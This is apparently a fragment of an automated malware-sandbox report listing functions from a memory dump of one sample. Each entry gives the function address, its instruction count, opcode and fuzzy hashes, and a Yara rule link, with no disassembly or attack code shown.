                                                                                                                0x00a66269
                                                                                                                0x00a65eac
                                                                                                                0x00a65ebb
                                                                                                                0x00a65ebe
                                                                                                                0x00a65ecb
                                                                                                                0x00a65ecb
                                                                                                                0x00a65ece
                                                                                                                0x00a65ece
                                                                                                                0x00a65ed4
                                                                                                                0x00a65ed7
                                                                                                                0x00a65ed9
                                                                                                                0x00a65edb
                                                                                                                0x00a65edb
                                                                                                                0x00a65ee1
                                                                                                                0x00a65ee1
                                                                                                                0x00a65ee3
                                                                                                                0x00a65f20
                                                                                                                0x00a65f20
                                                                                                                0x00a65ee5
                                                                                                                0x00a65ee5
                                                                                                                0x00a65ee5
                                                                                                                0x00a65ee8
                                                                                                                0x00a65f11
                                                                                                                0x00a65f18
                                                                                                                0x00a65eea
                                                                                                                0x00a65eea
                                                                                                                0x00a65eed
                                                                                                                0x00a65ef2
                                                                                                                0x00a65ef8
                                                                                                                0x00a65efb
                                                                                                                0x00a65f0a
                                                                                                                0x00a65f0a
                                                                                                                0x00a65eed
                                                                                                                0x00a65ee8
                                                                                                                0x00a65f22
                                                                                                                0x00a65f28
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a65f30
                                                                                                                0x00a65f31
                                                                                                                0x00a65f37
                                                                                                                0x00a65f3a
                                                                                                                0x00a65f3d
                                                                                                                0x00a65f44
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a65f46
                                                                                                                0x00a65f48
                                                                                                                0x00a65f4d
                                                                                                                0x00000000
                                                                                                                0x00a65f4d
                                                                                                                0x00a65dda
                                                                                                                0x00a65ddf
                                                                                                                0x00000000
                                                                                                                0x00a65ddf
                                                                                                                0x00a65dd8
                                                                                                                0x00a65da7
                                                                                                                0x00a65da9
                                                                                                                0x00a65dac
                                                                                                                0x00a65dae
                                                                                                                0x00000000
                                                                                                                0x00a65db4
                                                                                                                0x00a65db4
                                                                                                                0x00000000
                                                                                                                0x00a65db4
                                                                                                                0x00a65dae
                                                                                                                0x00a65d88
                                                                                                                0x00a65d8d
                                                                                                                0x00a66363
                                                                                                                0x00a66369
                                                                                                                0x00a6636a
                                                                                                                0x00a66370
                                                                                                                0x00a66372
                                                                                                                0x00a6637a
                                                                                                                0x00a6637b
                                                                                                                0x00a6637d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a6637f
                                                                                                                0x00a66385
                                                                                                                0x00000000
                                                                                                                0x00a66385
                                                                                                                0x00a65d38
                                                                                                                0x00a65d3b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a65d3b
                                                                                                                0x00a65d27
                                                                                                                0x00a65d29
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a66360
                                                                                                                0x00000000
                                                                                                                0x00a66360
                                                                                                                0x00a65c10
                                                                                                                0x00a65c10
                                                                                                                0x00a663da
                                                                                                                0x00a663e5
                                                                                                                0x00a663e5

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0ae9f34a2a6a1c21ad73af7bbd57b7f576873c33a67f20a49eb1ab95868cfefa
                                                                                                                • Instruction ID: 34094a6ee4db39828bad4ca80f4060e631a2a4869710ab347bed37118f7b529b
                                                                                                                • Opcode Fuzzy Hash: 0ae9f34a2a6a1c21ad73af7bbd57b7f576873c33a67f20a49eb1ab95868cfefa
                                                                                                                • Instruction Fuzzy Hash: 16424675E00629CFDB24CF68C881BA9B7B1FF49304F1581AAD94DAB342E7359A85CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009B4120, Relevance: .4, Instructions: 444COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a890887146814c9bf930ff45e992028b01f17b19b9808ef86cf17ae9c594accd
                                                                                                                • Instruction ID: 0da3d4e36ec1eba7587c096968c3b2afbe781b1e59fcb705c214c10a8007862e
                                                                                                                • Opcode Fuzzy Hash: a890887146814c9bf930ff45e992028b01f17b19b9808ef86cf17ae9c594accd
                                                                                                                • Instruction Fuzzy Hash: 5BF18F706082118FC724CF59C580ABAB7E6FF98724F14492EF596CB262E734D891EB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009C20A0, Relevance: .4, Instructions: 420COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c23d8bb1f9014714dadde88b3d3305d2a8716d7e63e4c6e87b6b369a0b90e5c6
                                                                                                                • Instruction ID: 126c5d223ae3fb93f7c1055454b278f814a2f57ade0a7d34dd62a22c1594f52d
                                                                                                                • Opcode Fuzzy Hash: c23d8bb1f9014714dadde88b3d3305d2a8716d7e63e4c6e87b6b369a0b90e5c6
                                                                                                                • Instruction Fuzzy Hash: 76F1F031E087459FDB29CB28C840B6B77E5AFD5764F18892DE8999B290D738DC41CB83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009A849B, Relevance: .3, Instructions: 290COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 04f2ae20d1dcf158eee85d0af31949f875b982179f45549e07ef6b42f794713d
                                                                                                                • Instruction ID: 06834998f2f0e14914d4a09c411c377278e5015aa21899533af1af2ff79d4a12
                                                                                                                • Opcode Fuzzy Hash: 04f2ae20d1dcf158eee85d0af31949f875b982179f45549e07ef6b42f794713d
                                                                                                                • Instruction Fuzzy Hash: 63B14CB0E04249DFDB14DFD9C984BAEBBB9FF89304F20452AE505AB251DB74AD41CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009C513A, Relevance: .3, Instructions: 258COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 60c63e833385c979d65165643b23531c30e543fadbac9ca56ee927cc476f3aac
                                                                                                                • Instruction ID: 7b7d24e5f53cbebee32a902050de92a8aaa35b19033d14b480bcd2dd5d194ec9
                                                                                                                • Opcode Fuzzy Hash: 60c63e833385c979d65165643b23531c30e543fadbac9ca56ee927cc476f3aac
                                                                                                                • Instruction Fuzzy Hash: 0DC103755087818FD354CF28C580B5AFBE1BF88308F18896EF8998B392D775E985CB42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009C03E2, Relevance: .3, Instructions: 254COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 10ae0f7067def58afe24dd06bd9486875aebb8df36ef75d0e168599460890033
                                                                                                                • Instruction ID: acf3bca73fba99fd9f47291049d10951c712e33f899fe4885c657d9a3bfb8949
                                                                                                                • Opcode Fuzzy Hash: 10ae0f7067def58afe24dd06bd9486875aebb8df36ef75d0e168599460890033
                                                                                                                • Instruction Fuzzy Hash: 2D915B71E04258DFEB21DBA8DC45FAE7BA4BF85724F150265FA10AB2E1E7349D00C782
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0099C600, Relevance: .2, Instructions: 225COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c329cba9848db6b297f42291076ce4f7e5c6aec852ae83704b74ed1c1d1f73ca
                                                                                                                • Instruction ID: 3a1c1cc950e5aa6269b3cb457d4a13e13225055d1a36c6f17d50764bc7b3983f
                                                                                                                • Opcode Fuzzy Hash: c329cba9848db6b297f42291076ce4f7e5c6aec852ae83704b74ed1c1d1f73ca
                                                                                                                • Instruction Fuzzy Hash: 81819275A482099FCB25CF14D891B7E73A5FB94390F64481AFD469B281D330FD41CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A2B8D0, Relevance: .2, Instructions: 199COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9da55c4bad3516bdb92b7cdd19515482b32e73412811347371e7e1ad2d699b04
                                                                                                                • Instruction ID: 1f23fdb90c12d6c2db659221ec1d614cf5e6acf83735263351d53bb051ee312a
                                                                                                                • Opcode Fuzzy Hash: 9da55c4bad3516bdb92b7cdd19515482b32e73412811347371e7e1ad2d699b04
                                                                                                                • Instruction Fuzzy Hash: B0713F32250B11EFDB31DF18D941F66B7B5EB80720F248938F6558B6A1DB71E980CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A16DC9, Relevance: .2, Instructions: 199COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                • Instruction ID: fb8e53633901392b5e8494810909b1ebd9c2dd63a593a5ae3517c0ae2d6d03df
                                                                                                                • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                • Instruction Fuzzy Hash: 57716E71E00219EFCB10DFA5CA85AEEBBB9FF88710F104569E505E7251DB34AE41CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009952A5, Relevance: .2, Instructions: 161COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e9ceb26cd301c2aae107aac60154e7869b74039c688fa1ecd00fbf8068eab93a
                                                                                                                • Instruction ID: e89dcec2da7185708456db3e1134a59a3c9a4233d8ab078a656a3301fc162006
                                                                                                                • Opcode Fuzzy Hash: e9ceb26cd301c2aae107aac60154e7869b74039c688fa1ecd00fbf8068eab93a
                                                                                                                • Instruction Fuzzy Hash: 6C51CD30109741ABC721EF68C842B2BBBE8FF90710F24491AF4A587652EB74E804C792
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009C2AE4, Relevance: .2, Instructions: 159COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1de7b39f82703ec7e7f653280f024f952791b8bfcb59ced285b6673d53050261
                                                                                                                • Instruction ID: 9d1d097ec14546e1b68b55fb0789f42a9367611d27c3d23bf865f36e54d19756
                                                                                                                • Opcode Fuzzy Hash: 1de7b39f82703ec7e7f653280f024f952791b8bfcb59ced285b6673d53050261
                                                                                                                • Instruction Fuzzy Hash: 5151C076F001168FCB18CF1CC880ABDB7B1FB89700715845EE896AB364EB34AE41DB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A5AE44, Relevance: .2, Instructions: 152COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d2995bdf19834169dc9d98d4ef062c84c3d5eb595821cde689a44fa4e7cebe7a
                                                                                                                • Instruction ID: bcea440f4016bc822b3c17ae147200b1371328ac44d8b3309e5275d11d716dd5
                                                                                                                • Opcode Fuzzy Hash: d2995bdf19834169dc9d98d4ef062c84c3d5eb595821cde689a44fa4e7cebe7a
                                                                                                                • Instruction Fuzzy Hash: EF41D3B17042119BC72ADB29C895B3BB799BFA4762F148319FC1687291DB34DC0DC7A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009BDBE9, Relevance: .1, Instructions: 149COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c128e3c676871aa62fac84d9874ec48c88c269d0254865d30d92c16c65cba883
                                                                                                                • Instruction ID: 606897be734fc0774f8d57e0af88d9d399a9264bcab9e9ab9412d78585f896c2
                                                                                                                • Opcode Fuzzy Hash: c128e3c676871aa62fac84d9874ec48c88c269d0254865d30d92c16c65cba883
                                                                                                                • Instruction Fuzzy Hash: EB51A171A02205CFCB14CFA8C590B9EFBF5BF88320F208559D595A7380EB35AD44CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A6740D, Relevance: .1, Instructions: 141COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                • Instruction ID: 83c264f87ea9a03d57849e894712f7c1ed062aeea9bae7dbd7ef520a302ab926
                                                                                                                • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                • Instruction Fuzzy Hash: 8E51BC71600606EFDB15CF14C481A9ABBB5FF45308F14C1BAE9099F222E771E946CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009C2990, Relevance: .1, Instructions: 133COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ab1f53701aa046f115b0b7dc5328b3d0221241e3214d49ad755154a5649ba8ab
                                                                                                                • Instruction ID: 0036f8673d84d2d0b8640ecd25eaee98715468798ce5e219cf3d4bd566f23999
                                                                                                                • Opcode Fuzzy Hash: ab1f53701aa046f115b0b7dc5328b3d0221241e3214d49ad755154a5649ba8ab
                                                                                                                • Instruction Fuzzy Hash: 38514471E00209EFDF25DF55C880E9EBBB5BB48310F148069E815AB2A1C3759D52DF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009C4BAD, Relevance: .1, Instructions: 131COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a012c5298f8d493f47bce9a1e3b83529dfb189042cfe9931085e2c195d63fe85
                                                                                                                • Instruction ID: 6d28be7539c7bf292fddfa1d77e0ea8371d920909bb55126bf10425ecca457a6
                                                                                                                • Opcode Fuzzy Hash: a012c5298f8d493f47bce9a1e3b83529dfb189042cfe9931085e2c195d63fe85
                                                                                                                • Instruction Fuzzy Hash: 1241C435E4122C9BCB20DF68C941FEA77B8EF45710F0144A9E948AB291DB34DE80CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009C4D3B, Relevance: .1, Instructions: 131COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7bb09153674844556149fc1a5962bfe58d3ef470854e099cb2396b52617acbef
                                                                                                                • Instruction ID: f68deadc178173cdffbd6b033068025444e6267d15c2ac96bb44f22897207eb0
                                                                                                                • Opcode Fuzzy Hash: 7bb09153674844556149fc1a5962bfe58d3ef470854e099cb2396b52617acbef
                                                                                                                • Instruction Fuzzy Hash: 5C41C271B403189FEB21DF14CC91FAAB7A9FB84714F0544AEE8499B281DB74ED40CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009A8A0A, Relevance: .1, Instructions: 120COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fa4c95e53998e2e316a82a5edcaa8bb1818791a5cf6f7a2cdf58475d09db81b5
                                                                                                                • Instruction ID: a19ca7311bac9264e4443a8685c82f54aebfe9a618d78389a07fe817738baa6a
                                                                                                                • Opcode Fuzzy Hash: fa4c95e53998e2e316a82a5edcaa8bb1818791a5cf6f7a2cdf58475d09db81b5
                                                                                                                • Instruction Fuzzy Hash: ED4177B1A4032C9BDB24DF55CC88BAAB7F8FB95300F1045EAD81997251DB749E80CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A5AA16, Relevance: .1, Instructions: 120COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                                • Instruction ID: 7bd682b15395b0139d95f7d16b703c4f09bf6a0cfaa1bb9b40dac8947628481e
                                                                                                                • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                                • Instruction Fuzzy Hash: DC311332F001046BDB158B69CD45BAFF7BBFF90352F168269EC01A7281DA709D08C791
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A5FDE2, Relevance: .1, Instructions: 116COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                                • Instruction ID: 3153b97c0c3e49c480b44e37dff55534a2d83517dd931c964ea3cfaa94ac97f3
                                                                                                                • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                                • Instruction Fuzzy Hash: C73114323006406FD7229B68C946F6ABBEAFBC5352F184568FC468B752DA74DC49C720
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A5EA55, Relevance: .1, Instructions: 111COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                                • Instruction ID: f79afe79377cea4ea0a199ed2fa3d6f884d71fd2cfeebc6f26dcd435d4c5589a
                                                                                                                • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                                • Instruction Fuzzy Hash: 3731D072604705AFC719DF24C981A6BB7AAFFC0351F048A2DF99687641DE30E909CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A169A6, Relevance: .1, Instructions: 108COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8f4ae1705911f1218bd60b3f254b8e5d9560b059361167d9da79037a02fd137a
                                                                                                                • Instruction ID: 829d6a878c2e103571b26002f9983fa3f3f3dbdc6a17b16f8bf7c0a37d29ed8e
                                                                                                                • Opcode Fuzzy Hash: 8f4ae1705911f1218bd60b3f254b8e5d9560b059361167d9da79037a02fd137a
                                                                                                                • Instruction Fuzzy Hash: 7941A9B1D40208AFDB24DFA8D941BFEBBF8EF88714F14812AE814E7251DB749945CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00995210, Relevance: .1, Instructions: 107COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c0f00b2ce12425c5b81cf21b526a1ce214f2d3d5cddbaecd602ea66206bbe803
                                                                                                                • Instruction ID: 6b9a5bd0e6a8ab6686a4b4b5fb6443da461b143074312d595b7fb647d056d6ab
                                                                                                                • Opcode Fuzzy Hash: c0f00b2ce12425c5b81cf21b526a1ce214f2d3d5cddbaecd602ea66206bbe803
                                                                                                                • Instruction Fuzzy Hash: 3A310C31551B04EBCB26AB58C991B7BB7ADFF90760F214A25F5250B1D2DB70EC00C790
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D3D43, Relevance: .1, Instructions: 106COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1dabdb06cef055f14742677d8fb8599fe05aed247938c389d376e19902efd163
                                                                                                                • Instruction ID: f7357065d61f3776e92bc7b95a6415694fcc82674d6fe3c596e8907c6257712a
                                                                                                                • Opcode Fuzzy Hash: 1dabdb06cef055f14742677d8fb8599fe05aed247938c389d376e19902efd163
                                                                                                                • Instruction Fuzzy Hash: 6831DE31A44614DBC724CF29D842A6ABBE6EF85701B15C46AE849CB390E734DD40DBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009CA61C, Relevance: .1, Instructions: 106COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9960c578d78c1e2d6f560c1a282da5e9aa758cc5647c8ce5ac3569412bec225f
                                                                                                                • Instruction ID: 042736530b8b97aed1b24770580f382d4f35f329aa6647f5ba317668e3c5ef74
                                                                                                                • Opcode Fuzzy Hash: 9960c578d78c1e2d6f560c1a282da5e9aa758cc5647c8ce5ac3569412bec225f
                                                                                                                • Instruction Fuzzy Hash: DA416975E01209DFCB05CF68D990B99BBF1BB89314F19806DE804AF391D774AD01CB55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A17016, Relevance: .1, Instructions: 104COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
